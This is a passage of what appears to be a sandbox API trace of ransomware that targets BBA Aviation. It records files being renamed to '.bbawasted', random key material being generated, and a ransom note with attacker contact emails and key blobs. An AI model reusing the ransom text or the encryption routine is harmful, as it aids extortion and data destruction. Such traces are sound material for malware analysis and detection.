hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.187] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.187] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0161.188] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0161.188] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0161.199] _snwprintf (in: _Dest=0x6ac8f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kbnG+7Pu96bZ+uc1dJNplryg1eJ1iS2nIb2jyOlJN6AqloCrXdAo+jvY/a/zmHh7\r\no1dkIiekZ4EhyEfgH9cEkPFISX9+2SYn30Hhk2qZLOgr7v/Ap5/3628ShhFDsHpP\r\n/o0ZisVa/zBEv9GsKUfPOenYrvSFbVi3FgTJ5SqrXTo5U4H9i/s0ACZnlhQR/lgu\r\n47HmJy3Sxn0ieqDtgWK3onkkgJK0P1+cR5PusHpbw/Sm00BlvNZmojdeBtCRBGqW\r\nEZwqPGQgMphLVGMdXIbE32ufpXZaXGdUO6ovuVea5WRIqe3ZgwWJwDsE3BiOikFq\r\nADVQ4ErSqPH1EsTye9EmTb3Er07PTNaucjMG5bmcQWQjtOG/vzTR3GzHs1zYiWcg\r\nkNr7o3bZ2WXLdG34tBhtFK8F0eTuWmIbPQG/eQkGHW/D/i9CahXbdBPAJmbXeG7k\r\nk5qNHHXRooXFtHoOvHYj+2y5AiccpInsczPi1XQFa8hsCHDzOIwIq1v8br5jozaw\r\n9EC/KUCMjQ0xlpgeZTwru2Ykbv+LlqhZaRk8ZIaTnI1ngzEjWohyVSG8TCYoFGAG\r\nhJIJiwlPr1uKY6Hz6Jtg+hOxyIMwS6mGjIV1Og0V427sf02/RO56UztNRbEQ9bfM\r\niOcDwugkTNbGu03fG85MetnxjNef6JBS3Pyt5NuT0pS=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.199] WriteFile (in: hFile=0x27c, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0161.199] SetEndOfFile (hFile=0x27c) returned 1 [0161.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0161.202] CloseHandle (hObject=0x27c) returned 1 [0161.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0161.204] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1468 | out: hHeap=0x660000) returned 1 [0161.204] _aulldvrm () returned 0x0 [0161.204] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0161.205] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0161.205] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.205] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 48 [0161.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0161.205] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0161.205] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0161.206] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6ac8f8 | out: pbBuffer=0x6ac8f8) returned 1 [0161.206] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.206] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0161.302] WriteFile (in: hFile=0x280, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.303] SetEndOfFile (hFile=0x280) returned 1 [0161.303] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.303] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0161.304] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.bbawasted")) returned 1 [0161.304] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0161.305] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0161.305] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xfed6 [0161.305] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfed6) returned 0x630000 [0161.305] CloseHandle (hObject=0x27c) returned 1 [0161.312] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0161.313] CloseHandle (hObject=0x28c) returned 1 [0161.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.313] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0161.313] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.313] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.314] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0161.314] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0161.314] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.347] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]mOgGecjGLnr7Djm1opRVcRRbWW3WdZzIYMBwc35URL7Yr/DTHbHHzERB287YrNfN\r\nWsvN269EMZKiCww4sOTQcShPOV7Jr0A5sdsJHSdE/v2Eoj/4NUe0LHhpBNLJ03Hp\r\nZ+28BBXxGRjU1ynySPNcuXWBlEVc8X6VpKBB9i9cB9qGQ/DM1ldSK16TPCSKKNHv\r\nBopu0mUdYwreO9g/tcm+KsC018qZJfQNebXZEay6WRluwqc+2XNIyPKH40MIZZ+5\r\nGmqeAPCO/4imqS7P14Nonnkt6KTHC+u89MFrLG+Mjh4yd0iuOZnWnu45fn1DxkiD\r\nW0vfvcoIKFnAw2GLbM3Ap2uCcenKft9E2MYmDg+UCHmQ4Pq4bj/sOXiJtXw3M4vV\r\n8MbRf8r07ddK2vqo6Sc1a1p+otfzMbc9wjS6VpQVJrZP/7o4oBaO5S07OIdaBgn7\r\nAgetYPsJjgfojf7NJwKWOu/a/WHMiohXVEluaHFeAxC/6WGiNohSpsCPJSi9wkJM\r\n0YQ/gR/YwMB6PNkJJExlm3JX2lz3aACJZnRFmvVjQY8UFXvB26nYtMkmbcIfrRdJ\r\nPGi6tn0G2qVHO0LqJF84bd3y3eLUuBhHrl4xv/f2ZzTi3ykU3ului/hazB73Wj9Q\r\ng8hjsoBmldY1e0u0vrWvpYTv8NcWYlK+sKPSwpXX2zn=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.347] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0161.347] SetEndOfFile (hFile=0x280) returned 1 [0161.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.350] CloseHandle (hObject=0x280) returned 1 [0161.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0161.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1e38 | out: hHeap=0x660000) returned 1 [0161.352] _aulldvrm () returned 0x0 [0161.352] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0161.353] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0161.353] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.353] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 48 [0161.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0161.353] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.353] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0161.354] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0161.354] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.354] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0161.354] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.355] SetEndOfFile (hFile=0x280) returned 1 [0161.356] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.356] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.bbawasted")) returned 1 [0161.356] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0161.357] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0161.357] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x13712 [0161.357] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13712) returned 0x630000 [0161.357] CloseHandle (hObject=0x28c) returned 1 [0161.553] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0161.554] CloseHandle (hObject=0x27c) returned 1 [0161.554] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.554] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0161.555] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.555] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.555] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0161.555] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0161.555] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.566] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]qh0NNd16ICMPzSvvihyYko0kBx3jA1SlcsRkEVRgT2th647qeeYqzPXndWaUXv+w\r\nLTwi88GNvzWGEKt+dHROo1BMAPAZXvqo7YIV+M9I2qUgYpU6P0mrNjB5UAZTJqOa\r\nsPeuSl64RcQ3gbqFDKRAsZbD2aGr3QAwrbouz/cIE1bZx+tjwnSyERYWo2p+50IH\r\ngbR0zENNtMrkjNCJSuLTbmes0rqPyFtC7IAHmJ7dl3tMTsldlUIaDu5p++j6Xqo6\r\nQMy7mGGd0wocCxWxG5WNCmTZkIIKj3Ne5/idm5j0VKZiN3vLDjuGC/nU9aUDAcMk\r\nL3gY3yckQtKn9tZyhKTfGT3oh6W1hogNQf9dfi1zie7gXSjzC916atY+k0g1T5z3\r\nPdZ8c+Ll0+Mnr5ONj6U8D9zyo+RxIAyoSVLdoEg7L0j5Ym46DCOFEc4CTFPja99i\r\nvAA9X3DUPecTNbcVypYcWSs2TnGmhO2+1mdlwBcFbXu+AAe+NVR7UN6bMYpEmqGH\r\nSXUtplSm4n3crhstgTkT4iz4JWWoBkdU3bvTj/BPybfPRj6XEh51iwosICjgVeMX\r\nut4OKRTIkZtGMbGhnD9o/TLwwNTdAfg/WSfM3iL7i3PDxuf3NjOSpe7dbxLk2lby\r\n8qeRIINNfcFVoqdHnc7QwgmbYWVyCZ8kTrBKSSN37PJ=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.566] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.566] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0161.566] SetEndOfFile (hFile=0x280) returned 1 [0161.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.570] CloseHandle (hObject=0x280) returned 1 [0161.571] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0161.572] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1cb8 | out: hHeap=0x660000) returned 1 [0161.572] _aulldvrm () returned 0x0 [0161.572] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0161.573] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0161.573] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.573] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 48 [0161.573] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0161.573] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0161.573] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.573] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0161.573] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0161.573] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0161.573] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0161.574] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0161.576] SetEndOfFile (hFile=0x280) returned 1 [0161.576] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.576] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0161.576] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0161.576] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.bbawasted")) returned 1 [0161.577] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0161.577] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0161.577] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x135c0 [0161.577] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x135c0) returned 0x630000 [0161.578] CloseHandle (hObject=0x27c) returned 1 [0161.650] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0161.650] CloseHandle (hObject=0x28c) returned 1 [0161.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0161.650] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef68) returned 1 [0161.651] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0161.651] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0161.651] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef68) returned 1 [0161.652] CryptGenRandom (in: hProv=0x6aef68, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0161.652] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0161.662] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0161.663] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0161.663] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0161.663] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]l3ko1iTvWmoq9nX8Vl4c0vc1VAHtc8k0E/eT9nb2nTrVGEBhVHQVDMvXiUSRHG31\r\nOexFJBvQ9LsQ7Vayslf8SaocLmsC6bMSuZtKwfqWZApKZRDXBYoJtewNCKhPZd6H\r\niw/hRlXNOI7u0SF6/wAVQ2HW4OI5TIia/Qef01JPSzlE8zOsyEuQlCgIBmSAFOEO\r\nsGYU1i+i8MjW6ckuEAYVH5w3FgkX2jthNB7IPEgcF2aAGUXepBo1byW1FWGNBUBd\r\nFvQvKbwrzpdBvTeq2V2r/aqPDkm0OwEIn8/PXD0mOM7sZIIdqSNdGjd/kMopGmuK\r\nEgrxGVhsHerXeMKufD2PJg2D/El8pCTNLIdb//c5mP3rnH8hwExNZG0Xt9YT+RUS\r\nUCQ7kh+mYNfbd81/nlvOTaHduDeLt/b6kAv454ip6ggJFGmKb8vPDRfd6pSXOqOi\r\ndMnUEC1epuidQ0PxwGC8F9FK8RWw4yN/ObpxOvkSB+HdtwOEYC+WEM2p3Ubxu/Ge\r\nnIQmNyKqsD998fjuU2gCojR8TMxdZtK/9894ks+VMCYBUzarRsvnVFIURN9IE1vv\r\nyhthu7LSnCIr5aAzHAmCBchxgZUZ+Yx7Gn0JoVrxDJ3pWfkZ7FBjK4PMhzXOVWfP\r\n/Eg+1YmtCRqANxU5PeFAZhdLyxyo0EngG3e2P6PLFeP=[end_key]\r\nKEEP IT\r\n") returned 984 [0161.663] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0161.663] WriteFile (in: hFile=0x280, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, 